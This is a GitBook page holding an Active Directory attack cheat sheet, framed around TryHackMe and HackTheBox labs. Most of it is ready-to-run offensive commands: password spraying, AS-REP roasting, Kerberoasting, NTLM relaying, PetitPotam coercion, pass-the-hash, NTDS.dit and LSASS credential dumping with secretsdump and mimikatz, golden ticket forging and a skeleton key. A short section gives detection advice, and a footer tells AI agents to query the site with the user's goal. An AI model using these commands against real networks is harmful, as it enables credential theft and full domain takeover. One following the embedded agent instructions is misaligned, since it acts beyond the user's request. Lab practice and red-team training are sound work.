> For the complete documentation index, see [llms.txt](https://aenosh-rajora.gitbook.io/cyber-codex/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://aenosh-rajora.gitbook.io/cyber-codex/active-directory-cheat-sheet-for-2025.md).

# Active Directory Cheat Sheet for 2025

<figure><img src="https://cdn-images-1.medium.com/max/800/0*YMlH4El_HffbE7qz.png" alt=""><figcaption></figcaption></figure>

> *Active Directory is the spine of enterprise networks — break it, and the whole body collapses.*

Welcome to your **2025-ready Active Directory (AD) cheat sheet** — a masterkey reference combining offensive, defensive, and investigative commands. Whether you’re mapping domain forests as a red teamer or auditing misconfigs as a blue team analyst, this cheat sheet turns your recon into results.

This isn’t just theory — each section below is inspired by real-world labs and CTFs like **TryHackMe’s Attacking AD, Ignite, Wreath**, and **HackTheBox’s Labs** (free tier).

## Scan Network & Initial Enumeration <a href="#b68a" id="b68a"></a>

📌 Think of this like taking a flashlight into a dark room — you’re identifying where the machines live and how they talk.

### **Lab Used**: *TryHackMe — Ignite (Free)*

* `nmap -sP <target_range>` — Sweep the subnet for life.
* `nmap -PN -sV --top-ports 50 --open <target_ip>` — Fingerprint the top talkers.
* `nmap -PN --script smb-vuln* -p139,445 <target_ip>` — Check SMB doors for rusty locks.
* `cme smb <target_range>` — CrackMapExec meets Samba: Discover shares, users, and more.

## Active Directory Discovery <a href="#id-9b4d" id="id-9b4d"></a>

**Real-World Feel**: Like sneaking into a library and figuring out the floor plan before grabbing the rare books.

**Lab Used**: *TryHackMe — Attacking AD*

* `nslookup -type=SRV _ldap._tcp.dc._msdcs.DOMAIN.LOCAL` — Sniff out Domain Controllers.
* `dig axfr @dns_server domain.local` — (If misconfigured) grab every DNS record.
* `enum4linux -a -u "" -p "" <target_ip>` — Anonymous recon.
* `smbmap -u "guest" -p "" -P 445 -H <target_ip>` — Test for open access.

**Try This in Wreath**: Compare anonymous SMB access vs. guest login.

## Gaining Foothold: Attacks That Work <a href="#a15e" id="a15e"></a>

**This is your beachhead.** You’re not deep yet — but you’ve got a toe in the door.

**Password Spraying**

* `cme smb -u user.txt -p password.txt <target_ip>`→ Blanket login attempts with caution.

**AS-REP Roasting**

```
GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat
```

* **Demo This**: *TryHackMe — Wreath*, where one user lacks pre-auth and leaks hashes.

**LLMNR Poisoning + Relays**

```
responder -I tun0 
ntlmrelayx.py -tf targets.txt -socks -smb2support
```

**PetitPotam NTLM Coercion**

* `PetitPotam.py -d DOMAIN.LOCAL <attacker_ip> <target_ip>` — Weaponized forced auth.

## Post-Exploitation & Lateral Movement <a href="#cf2a" id="cf2a"></a>

**This is where it gets cinematic.** You’ve got creds. Now you walk the domain.

**Real-Lab Example**: *HackTheBox — Offshore (Free)* has this exact flow with SMB shares, BloodHound ops, and user hops.

**BloodHound Collection**

```
bloodhound-python -d DOMAIN -u USER -p PASS -gc DC_IP -c all
```

**Enumerate Shares**

```
cme smb <target_ip> -u user -p pass --shares
```

**Kerberoasting**

```
GetUserSPNs.py -request -dc-ip DC_IP DOMAIN/USER:PASS
```

**Pass-the-Hash / Key**

```
evil-winrm -i <ip> -u user -H <NTLM hash>

wmiexec.py -hashes :NTLM user@target
```

## Domain Dominance <a href="#de7b" id="de7b"></a>

*Endgame begins.* You now own one machine. Time to own the forest.

**Credential Dumping**

```
secretsdump.py DOMAIN/USER:PASS@DC_IP # Get that juicy NTDS.dit.
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"
```

**Golden Ticket**

```
ticketer.py -nthash <krbtgt_hash> -domain-sid <sid> -domain DOMAIN <user>
```

**Skeleton Key**

`mimikatz "privilege::debug" "misc::skeleton"` — One key to rule them all.

## Blue Team & Detection Notes <a href="#id-2f66" id="id-2f66"></a>

**Defend like a hunter.** Here’s what defenders *should* be doing.

* Monitor PowerShell logs: `Sysmon + WinLogBeat + Elastic`.
* Detect responder/LLMNR poisoning with: `Invoke-DetectResponder.ps1`
* Enable SMB signing to nullify NTLM relays.
* Set `Audit Directory Services Changes` for object manipulation.
* Rotate `krbtgt` password twice after compromise.

*TryHackMe — Security Analyst Path* offers hands-on SIEM and GPO audit labs.

## Hash Cracking Cheat Codes <a href="#id-80cb" id="id-80cb"></a>

<figure><img src="https://cdn-images-1.medium.com/max/800/1*aLnasR6M2fDo9SSFRIybMw.png" alt=""><figcaption></figcaption></figure>

## Bonus: Custom Tools & Power Scripts <a href="#id-1f7e" id="id-1f7e"></a>

* `PowerView.ps1` – Swiss army knife for AD enum.
* `SharpHound.exe` – Native collector for BloodHound.
* `Invoke-Kerberoast`, `Invoke-UserHunter`, `Get-GPPPassword` – Part of PowerSploit.
* `adidnsdump` – Digs through DNS for fun and creds.

## Final Note <a href="#f19c" id="f19c"></a>

This isn’t a cheat sheet — it’s a tactical guide. Pair these commands with real labs, reflect on each step, and **don’t memorize — internalize**.

> *“The more silently you move in AD, the louder your skills speak.”*


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://aenosh-rajora.gitbook.io/cyber-codex/active-directory-cheat-sheet-for-2025.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
